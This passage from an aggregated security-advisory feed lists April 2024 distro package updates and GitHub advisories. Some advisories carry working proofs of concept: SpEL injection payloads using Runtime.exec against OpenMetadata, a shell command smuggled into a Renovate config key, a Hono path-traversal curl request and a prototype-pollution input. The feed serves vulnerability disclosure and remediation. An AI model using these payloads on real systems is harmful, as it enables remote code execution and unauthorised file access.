- Fix 11.0.22 release date in NEWS
- Restore ppc64le --with-jobs=1 workaround to avoid flaky ppc builds
[1:11.0.23.0.9-1]
- Update to jdk-11.0.23+9 (GA)
- Update release notes to 11.0.23+9
- Switch to GA mode for release
- Require tzdata 2024a due to upstream inclusion of JDK-8322725
- Only require tzdata 2023d for now as 2024a is unavailable in buildroot
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
- Resolves: RHEL-30914
[1:11.0.23.0.1-0.1.ea]
- Update to jdk-11.0.23+1 (EA)
- Update release notes to 11.0.23+1
- Switch to EA mode
- Speed up PPC build by removing ppc64le --with-jobs=1 workaround

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1821

22.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1825] java-17-openjdk security update (moderate)

[17.0.11.0.9-2.0.1]
- Add Oracle vendor bug URL
[1:17.0.11.0.9-2]
- Update to jdk-17.0.11+9 (GA)
- Add openjdk-17.0.11+9.tar.xz to .gitignore
- Sync java-17-openjdk-portable.specfile from openjdk-portable-rhel-8
- Update buildver from 7 to 9
- Update portablerelease from 1 to 3
- Change is_ga from 0 to 1 to enable GA mode for release
- Update tzdata Requires comment to mention that 2024a is not yet in the buildroot
- Update tzdata BuildRequires comment to mention that 2024a is not yet in the buildroot
- Update tzdata BuildRequires from 2023c to 2023d
- Update sources from openjdk-17.0.11+7-ea.tar.xz to openjdk-17.0.11+9.tar.xz
- Resolves: RHEL-27137
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
[1:17.0.11.0.7-0.2.ea]
- Update to jdk-17.0.11+7 (EA)
- Sync java-17-openjdk-portable.specfile
- Sync java-17-openjdk-portable.specfile again to mention OPENJDK-2730
- Related: RHEL-27137
[1:17.0.11.0.6-0.2.ea]
- Update to jdk-17.0.11+6 (EA)
- Sync java-17-openjdk-portable.specfile
- Update buildjdkver to match the featurever
- Use featurever macro to specify fips patch
- Explain patchN syntax situation in a comment
- generate_source_tarball.sh: Fix whitespace
- generate_source_tarball.sh: Skip -ga tags
- generate_source_tarball.sh: Get -ea suffix from version-numbers.conf
- generate_source_tarball.sh: Use git archive to generate tarball
- generate_source_tarball.sh: Update version in comment
- generate_source_tarball.sh: Remove trailing period in echo
- generate_source_tarball.sh: Add indentation instructions for Emacs
- Require tzdata 2023d (JDK-8322725)
- generate_source_tarball.sh: Add license
- openjdk_news.sh: Use grep -E instead of egrep
- Remove RH1649512 patch for libjpeg-turbo FAR macro
- Move pcsc-lite-libs patch to in-need-of-upstreaming section
- Related: RHEL-27137

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1825
20.04.2024 15:00:55 | opensuse | [openSUSE-SU-2024:0112-1] Security update for perl-CryptX (moderate)

Security update for perl-CryptX

https://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0112-1

22.04.2024 11:21:39 | almalinux | [ALSA-2024:1912] firefox security update (important)

firefox security update

https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1912

22.04.2024 11:24:12 | almalinux | [ALSA-2024:1908] firefox security update (important)

firefox security update

https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1908
21.04.2024 03:00:00 | freebsd | [FREEBSD:9BED230F-FFC8-11EE-8E76-A8A1599412C6] chromium -- multiple security fixes (high)

Chrome Releases reports: This update includes 23 security fixes:

- [331358160] High CVE-2024-3832: Object corruption in V8. Reported by Man Yue Mo of GitHub Security Lab on 2024-03-27
- [331383939] High CVE-2024-3833: Object corruption in WebAssembly. Reported by Man Yue Mo of GitHub Security Lab on 2024-03-27
- [330759272] High CVE-2024-3914: Use after free in V8. Reported by Seunghyun Lee (@0x10n) of KAIST Hacking Lab, via Pwn2Own 2024 on 2024-03-21
- [326607008] High CVE-2024-3834: Use after free in Downloads. Reported by ChaobinZhang on 2024-02-24
- [41491379] Medium CVE-2024-3837: Use after free in QUIC. Reported by {rotiple, dch3ck} of CW Research Inc. on 2024-01-15
- [328278717] Medium CVE-2024-3838: Inappropriate implementation in Autofill. Reported by Ardyan Vicky Ramadhan on 2024-03-06
- [41491859] Medium CVE-2024-3839: Out of bounds read in Fonts. Reported by Ronald Crane (Zippenhop LLC) on 2024-01-16
- [41493458] Medium CVE-2024-3840: Insufficient policy enforcement in Site Isolation. Reported by Ahmed ElMasry on 2024-01-22
- [330376742] Medium CVE-2024-3841: Insufficient data validation in Browser Switcher. Reported by Oleg on 2024-03-19
- [41486690] Medium CVE-2024-3843: Insufficient data validation in Downloads. Reported by Azur on 2023-12-24
- [40058873] Low CVE-2024-3844: Inappropriate implementation in Extensions. Reported by Alesandro Ortiz on 2022-02-23
- [323583084] Low CVE-2024-3845: Inappropriate implementation in Network. Reported by Daniel Baulig on 2024-02-03
- [40064754] Low CVE-2024-3846: Inappropriate implementation in Prompts. Reported by Ahmed ElMasry on 2023-05-23
- [328690293] Low CVE-2024-3847: Insufficient policy enforcement in WebUI. Reported by Yan Zhu on 2024-03-08

https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:9BED230F-FFC8-11EE-8E76-A8A1599412C6
24.04.2024 01:33:22 | slackware | [SSA:2024-114-01] ruby

New ruby packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/ruby-3.0.7-i586-1_slack15.0.txz: Upgraded.
  This update fixes security issues:
  Arbitrary memory address read vulnerability with Regex search.
  RCE vulnerability with .rdoc_options in RDoc.
  Buffer overread vulnerability in StringIO.
  For more information, see:
    https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
    https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/
    https://www.ruby-lang.org/en/news/2024/03/21/buffer-overread-cve-2024-27280/
    https://www.cve.org/CVERecord?id=CVE-2024-27282
    https://www.cve.org/CVERecord?id=CVE-2024-27281
    https://www.cve.org/CVERecord?id=CVE-2024-27280
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/ruby-3.0.7-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/ruby-3.0.7-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/ruby-3.3.1-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/ruby-3.3.1-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
499174156baaa426ad71cbd34fdf7fd0  ruby-3.0.7-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
978395a7eccefb9f956beb3bd35944e8  ruby-3.0.7-x86_64-1_slack15.0.txz

Slackware -current package:
a235c65ee15b71aa96b1759ee081d4c4  d/ruby-3.3.1-i586-1.txz

Slackware x86_64 -current package:
01a7ba4fe0a608de700296a506f559f0  d/ruby-3.3.1-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg ruby-3.0.7-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-114-01
24.04.2024 00:15:57 | npm | [NPM:GHSA-624G-8QJG-8QXF] Conform contains a Prototype Pollution Vulnerability in `parseWith...` function (high)

### Summary
Conform allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to `parseWith...` functions.

### PoC
```javascript
const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });
parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"
```

### Details
The invocation of the `parseWithZod` function in the above PoC triggers the `setValue` function through `getSubmissionContext` and `parse`, executing the following process, resulting in prototype pollution:
```javascript
let pointer = value;
pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;
pointer.polluted = "polluted";
```
This is caused by the lack of object existence checking on [line 117 in formdata.ts](https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117), where the code only checks for the presence of `pointer[key]` without proper validation.

### Impact
Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-624G-8QJG-8QXF
24.04.2024 00:11:24 | maven | [MAVEN:GHSA-7VF4-X5M2-R6GR] OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`) (critical)

### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)

**Please note, only authorized and admin role users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability**

`CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)

```java
  @Override
  public void prepare(Policy policy, boolean update) {
    validateRules(policy);
  }
  ...
  public void validateRules(Policy policy) {
    List<Rule> rules = policy.getRules();
    if (nullOrEmpty(rules)) {
      throw new IllegalArgumentException(CatalogExceptionMessage.EMPTY_RULES_IN_POLICY);
    }
    // Validate all the expressions in the rule
    for (Rule rule : rules) {
      CompiledRule.validateExpression(rule.getCondition(), Boolean.class);
      rule.getResources().sort(String.CASE_INSENSITIVE_ORDER);
      rule.getOperations().sort(Comparator.comparing(MetadataOperation::value));
      // Remove redundant resources
      rule.setResources(filterRedundantResources(rule.getResources()));
      // Remove redundant operations
      rule.setOperations(filterRedundantOperations(rule.getOperations()));
    }
    rules.sort(Comparator.comparing(Rule::getName));
  }
```

`prepare()` is called from [`EntityRepository.prepareInternal()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693) which, in turn, gets called from the [`EntityResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219):

```java
public Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) {
  repository.prepareInternal(entity, true);

  // If entity does not exist, this is a create operation, else update operation
  ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName());
  MetadataOperation operation = createOrUpdateOperation(resourceContext);
  OperationContext operationContext = new OperationContext(entityType, operation);
  if (operation == CREATE) {
    CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity);
    authorizer.authorize(securityContext, operationContext, createResourceContext);
    entity = addHref(uriInfo, repository.create(uriInfo, entity));
    return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse();
  }
  authorizer.authorize(securityContext, operationContext, resourceContext);
  PutResponse<T> response = repository.createOrUpdate(uriInfo, entity);
  addHref(uriInfo, response.getEntity());
  return response.toResponse();
}
```

Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated.

In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by [`PolicyResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365):

```java
@PUT
@Operation(
    operationId = "createOrUpdatePolicy",
    summary = "Create or update a policy",
    description = "Create a new policy, if it does not exist or update an existing policy.",
    responses = {
      @ApiResponse(
          responseCode = "200",
          description = "The policy",
          content = @Content(mediaType = "application/json", schema = @Schema(implementation = Policy.class))),
      @ApiResponse(responseCode = "400", description = "Bad request")
    })
public Response createOrUpdate(
    @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreatePolicy create) {
  Policy policy = getPolicy(create, securityContext.getUserPrincipal().getName());
  return createOrUpdate(uriInfo, securityContext, policy);
}
```

This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.

#### Proof of concept
- Prepare the payload
  - Encode the command to be run (eg: `touch /tmp/pwned`) using Base64 (eg: `dG91Y2ggL3RtcC9wd25lZA==`)
  - Create the SpEL expression to run the system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`
- Send the payload using a valid JWT token:
```http
PUT /api/v1/policies HTTP/1.1
Host: localhost:8585
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
Authorization: Bearer <non-admin JWT>
accept: application/json
Connection: close
Content-Type: application/json
Content-Length: 367

{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}
```
- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server

#### Impact
This issue may lead to Remote Code Execution.

#### Remediation
Use [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude *references to Java types, constructors, and bean references*.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7VF4-X5M2-R6GR
23.04.2024 20:37:06 | ubuntu | [USN-6742-2] Linux kernel vulnerabilities (high)

Several security issues were fixed in the Linux kernel.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6742-2
23.04.2024 19:21:10 | npm | [NPM:GHSA-RQGV-292V-5QGR] Renovate vulnerable to arbitrary command injection via helmv3 manager and registryAliases (moderate)

### Summary
Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands.

### Details
Since [#26848](https://github.com/renovatebot/renovate/pull/26848), `registryAliases` has become mergeable. This means that the helmv3 manager started honoring its value and uses a `helm repo add <key> <parameters>` command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80

The key was not quoted, leading to the ability to use variable references (`$FOO`) in it and have them printed by Renovate on the pull request, or even running any shell commands.

### PoC
Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:

test-chart/Chart.yaml:
```
apiVersion: v2
name: redis
version: 1.0.0
dependencies:
  - name: redis
    version: 18.13.10
    repository: oci://registry-1.docker.io/bitnamicharts
```

test-chart/Chart.lock:
```
dependencies:
- name: redis
  repository: oci://registry-1.docker.io/bitnamicharts
  version: 18.13.10
digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38
generated: "2024-02-16T13:31:20.807026334Z"
```

Then add the following `renovate.json`:
```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": [
    "config:base"
  ],
  "registryAliases": {
    "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy"
  }
}
```

Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text:
```
File name: test-chart/Chart.lock

Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update
Error: "helm repo add" requires 2 arguments

Usage:  helm repo add [NAME] [URL] [flags]
bin
boot
dev
etc
go
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```

This shows that the `ls` command executed successfully, and we can even see its output.

Note that redirecting any output you want to see to stderr (`>&2`) and making sure the final command fails (`exit 1`) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output.

### Impact
All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RQGV-292V-5QGR
23.04.2024 19:20:50 | npm | [NPM:GHSA-3MPF-RCC7-5347] Hono vulnerable to Restricted Directory Traversal in serveStatic with deno (moderate)

### Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial
https://hono.dev/getting-started/deno

### PoC
```bash
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt
```

source
```jsx
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)
```

request
```bash
curl localhost:8000/static/%2e%2e/main.ts
```

response is content of main.ts

### Impact
Unexpected files are retrieved.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3MPF-RCC7-5347
23.04.2024 14:38:08 | ubuntu | [USN-6746-1] Google Guest Agent and Google OS Config Agent vulnerability

Google Guest Agent and OS Config Agent could be made to crash if it opened a specially crafted JSON.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6746-1
23.04.2024 14:20:04 | ubuntu | [USN-6728-3] Squid vulnerability (high)

Squid could be made to crash if it received specially crafted network traffic.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-3

23.04.2024 23:50:58 | npm | [NPM:GHSA-4RCH-2FH8-94VW] MySQL2 for Node Arbitrary Code Injection (critical)

Versions of the package mysql2 before 3.9.7 are vulnerable to Arbitrary Code Injection due to improper sanitization of the timezone parameter in the readCodeFor function by calling a native MySQL Server date/time function.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4RCH-2FH8-94VW

23.04.2024 03:00:00 | cisa | [CISA-2024:0423] CISA Adds One Known Exploited Vulnerability to Catalog (high)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0423

23.04.2024 03:00:00 | debian | [DSA-5673-1] glibc

security update

https://secdb.nttzen.cloud/security-advisory/debian/DSA-5673-1
23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1818] java-1.8.0-openjdk security update (moderate)

```
[1:1.8.0.412.b08-2.0.1]
- Add Oracle vendor bug URL [Orabug: 34340155]
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1818

23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1822] java-11-openjdk security update (moderate)

```
[1:11.0.23.0.9-3.0.1]
- Add Oracle vendor bug URL [Orabug: 34340155]
[1:11.0.23.0.9-2]
- Fix 11.0.22 release date in NEWS
[1:11.0.23.0.9-1]
- Update to jdk-11.0.23+9 (GA)
- Update release notes to 11.0.23+9
- Switch to GA mode for release
- Require tzdata 2024a due to upstream inclusion of JDK-8322725
- Only require tzdata 2023d for now as 2024a is unavailable in buildroot
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
- Resolves: RHEL-30920
[1:11.0.23.0.1-0.1.ea]
- Update to jdk-11.0.23+1 (EA)
- Update release notes to 11.0.23+1
- Switch to EA mode
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1822

23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1940] owO: thunderbird security update (low)

```
[115.10.0-2.0.1]
- Add Oracle prefs
- Add OpenELA debranding
[115.10.0-2]
- Update to 115.10.0 build2
[115.10.0-1]
- Update to 115.10.0 build1
- Revert expat CVE-2023-52425 fix
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1940

23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1963] golang security update (important)

```
[1.20.12-4]
- Rebuild for z-stream
- Related: RHEL-28939
[1.20.12-3]
- Fix CVE-2023-45288
- Resolves: RHEL-28939
- Temporarily disable FIPS tests (RHELBLD-14822)
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1963

23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1998] libreswan security update (moderate)

```
[4.12-2.0.1.2]
- Add libreswan-oracle.patch to detect Oracle Linux distro
[4.12-2.2]
- Fix patch application in the previous change
[4.12-2.1]
- Fix CVE-2024-2357 (RHEL-28742)
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1998
23.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1828] java-21-openjdk security update (moderate)

```
[1:21.0.3.0.9-1.0.1]
- Add Oracle vendor bug URL [Orabug: 34340155]
[1:21.0.3.0.9-1]
- Update to jdk-21.0.3+9 (GA)
- Update release notes to 21.0.3+9
- Switch to GA mode.
- Sync the copy of the portable specfile with the latest update
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
- Resolves: RHEL-32405
[1:21.0.3.0.7-0.1.ea]
- Update to jdk-21.0.3+7 (EA)
- Update release notes to 21.0.3+7
- Require tzdata 2024a due to upstream inclusion of JDK-8322725
- Only require tzdata 2023d for now as 2024a is unavailable in buildroot
- Drop JDK-8009550 which is now available upstream
- Re-generate FIPS patch against 21.0.3+7 following backport of JDK-8325254
- Resolves: RHEL-30944
[1:21.0.3.0.1-0.2.ea]
- Invoke xz in multi-threaded mode
- generate_source_tarball.sh: Add WITH_TEMP environment variable
- generate_source_tarball.sh: Multithread xz on all available cores
- generate_source_tarball.sh: Add OPENJDK_LATEST environment variable
- generate_source_tarball.sh: Update comment about tarball naming
- generate_source_tarball.sh: Reformat comment header
- generate_source_tarball.sh: Reformat and update help output
- generate_source_tarball.sh: Do a shallow clone, for speed
- generate_source_tarball.sh: Append -ea designator when required
- generate_source_tarball.sh: Eliminate some removal prompting
- generate_source_tarball.sh: Make tarball reproducible
- generate_source_tarball.sh: Prefix temporary directory with temp-
- generate_source_tarball.sh: Remove temporary directory exit conditions
- generate_source_tarball.sh: Fix -ea logic to add dash
- generate_source_tarball.sh: Set compile-command in Emacs
- generate_source_tarball.sh: Remove REPO_NAME from FILE_NAME_ROOT
- generate_source_tarball.sh: Move PROJECT_NAME and REPO_NAME checks
- generate_source_tarball.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- generate_source_tarball.sh: shellcheck: Double-quote variable references (SC2086)
- generate_source_tarball.sh: shellcheck: Do not use -a (SC2166)
- generate_source_tarball.sh: shellcheck: Do not use $ on arithmetic variables (SC2004)
- Use backward-compatible patch syntax
- generate_source_tarball.sh: Ignore -ga tags with OPENJDK_LATEST
- generate_source_tarball.sh: Fix whitespace
- generate_source_tarball.sh: Remove trailing period in echo
- generate_source_tarball.sh: Use long-style argument to grep
- generate_source_tarball.sh: Add license
- generate_source_tarball.sh: Add indentation instructions for Emacs
- Related: RHEL-30944
[1:21.0.3.0.1-0.2.ea]
- Install alt-java man page from the misc tarball as it is no longer in the JDK image
- generate_source_tarball.sh: Update examples in header for clarity
- generate_source_tarball.sh: Cleanup message issued when checkout already exists
- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP
- generate_source_tarball.sh: Only add --depth=1 on non-local repositories
- Move maintenance scripts to a scripts subdirectory
- discover_trees.sh: Set compile-command and indentation instructions for Emacs
- discover_trees.sh: shellcheck: Do not use -o (SC2166)
- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)
- generate_source_tarball.sh: Add authorship
- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs
- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)
- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: Set compile-command and indentation instructions for Emacs
- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)
- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)
- generate_source_tarball.sh: Output values of new options WITH_TEMP and OPENJDK_LATEST
- generate_source_tarball.sh: Double-quote DEPTH reference (SC2086)
- generate_source_tarball.sh: Avoid empty DEPTH reference while still appeasing shellcheck
- Related: RHEL-30944
[1:21.0.3.0.1-0.1.ea]
- Update to jdk-21.0.3+1 (EA)
- Update release notes to 21.0.3+1
- Switch to EA mode
- Require tzdata 2023d due to upstream inclusion of JDK-8322725
- Bump FreeType version to 2.13.2 following JDK-8316028
- Related: RHEL-30944
[1:21.0.2.0.13-2]
- Sync the copy of the portable specfile with the latest update
- Define portablesuffix according to whether pkgos is defined or not
- Related: RHEL-30944
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1828
25.04.2024 01:56:25 | ubuntu | [USN-6743-3] Linux kernel (Azure) vulnerabilities (high)

Several security issues were fixed in the Linux kernel.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-3

24.04.2024 22:55:01 | ubuntu | [USN-6657-2] Dnsmasq vulnerabilities (high)

Several security issues were fixed in Dnsmasq.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6657-2

24.04.2024 20:25:53 | ubuntu | [USN-6749-1] FreeRDP vulnerabilities (critical)

Several security issues were fixed in FreeRDP.

https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6749-1
24.04.2024 20:06:02 | maven | [MAVEN:GHSA-5XV3-FM7G-865R] OpenMetadata vulnerable to a SpEL Injection in `GET /api/v1/policies/validation/condition/` (`GHSL-2023-236`) (high)

### SpEL Injection in `GET /api/v1/policies/validation/condition/<expr>` (`GHSL-2023-236`)

***Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.***

The [`CompiledRule::validateExpression`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51) method evaluates an SpEL expression using an [`StandardEvaluationContext`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57), allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution.

The `/api/v1/policies/validation/condition/<expression>` endpoint passes user-controlled data to `CompiledRule::validateExpression`, allowing authenticated (non-admin) users to execute arbitrary system commands on the underlying operating system.

[Snippet from PolicyResource.java](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L448)

```java
  @GET
  @Path("/validation/condition/{expression}")
  @Operation(
      operationId = "validateCondition",
      summary = "Validate a given condition",
      description = "Validate a given condition expression used in authoring rules.",
      responses = {
        @ApiResponse(responseCode = "204", description = "No value is returned"),
        @ApiResponse(responseCode = "400", description = "Invalid expression")
      })
  public void validateCondition(
      @Context UriInfo uriInfo,
      @Context SecurityContext securityContext,
      @Parameter(description = "Expression of validating rule", schema = @Schema(type = "string"))
          @PathParam("expression")
          String expression) {
    CompiledRule.validateExpression(expression, Boolean.class);
  }
```

```java
  public static <T> void validateExpression(String condition, Class<T> clz) {
    if (condition == null) {
      return;
    }
    Expression expression = parseExpression(condition);
    RuleEvaluator ruleEvaluator = new RuleEvaluator();
    StandardEvaluationContext evaluationContext = new StandardEvaluationContext(ruleEvaluator);
    try {
      expression.getValue(evaluationContext, clz);
    } catch (Exception exception) {
      // Remove unnecessary class details in the exception message
      String message =
          exception.getMessage().replaceAll("on type .*$", "").replaceAll("on object .*$", "");
      throw new IllegalArgumentException(CatalogExceptionMessage.failedToEvaluate(message));
    }
  }
```

In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and therefore any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution.

This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.

#### Proof of concept
- Prepare the payload
  - Encode `touch /tmp/pwned` in Base64 => `dG91Y2ggL3RtcC9wd25lZA==`
  - SpEL expression to run system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`
  - Encode the payload using URL encoding:
```
%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%64%47%39%31%59%32%67%67%4c%33%52%74%63%43%39%77%64%32%35%6c%5a%41%3d%3d%22%29%29%29
```
- Send the payload using a valid JWT token:
```http
